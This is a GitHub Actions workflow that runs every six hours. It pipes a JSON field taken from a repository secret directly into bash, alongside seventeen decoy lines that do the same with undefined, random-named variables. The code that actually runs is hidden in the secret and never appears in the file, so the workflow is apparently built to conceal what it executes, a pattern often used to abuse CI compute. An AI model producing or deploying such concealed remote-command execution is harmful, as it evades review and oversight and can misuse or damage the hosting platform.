name: lingbingshuodai

on:
  workflow_dispatch:
  schedule:
    - cron: '4 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lingbingshuodai
        env:
          aqm65803: ${{ secrets.aqm65803 }}
        run: |
          echo $aqm65803 | jq -r .v6 | /bin/bash
          echo $gocvb9935 | jq -r .imerx30 | /bin/bash
          echo $aj2 | jq -r .yiz235 | /bin/bash
          echo $la4 | jq -r .gqg1 | /bin/bash
          echo $jv34490 | jq -r .f7 | /bin/bash
          echo $ew06 | jq -r .rii01157 | /bin/bash
          echo $cs0577 | jq -r .msnc31 | /bin/bash
          echo $vi5599 | jq -r .bctya875 | /bin/bash
          echo $pmnq7700 | jq -r .d693 | /bin/bash
          echo $snx397 | jq -r .evtiq65349 | /bin/bash
          echo $kyg260 | jq -r .vvxhr6439 | /bin/bash
          echo $dhoeq452 | jq -r .yvqg09 | /bin/bash
          echo $pw72 | jq -r .y5 | /bin/bash
          echo $swe5 | jq -r .kzhh639 | /bin/bash
          echo $kqu641 | jq -r .o5647 | /bin/bash
          echo $t970 | jq -r .xcmh75114 | /bin/bash
          echo $bxe21343 | jq -r .jh01763 | /bin/bash
          echo $bsagn83 | jq -r .yzbnh34 | /bin/bash

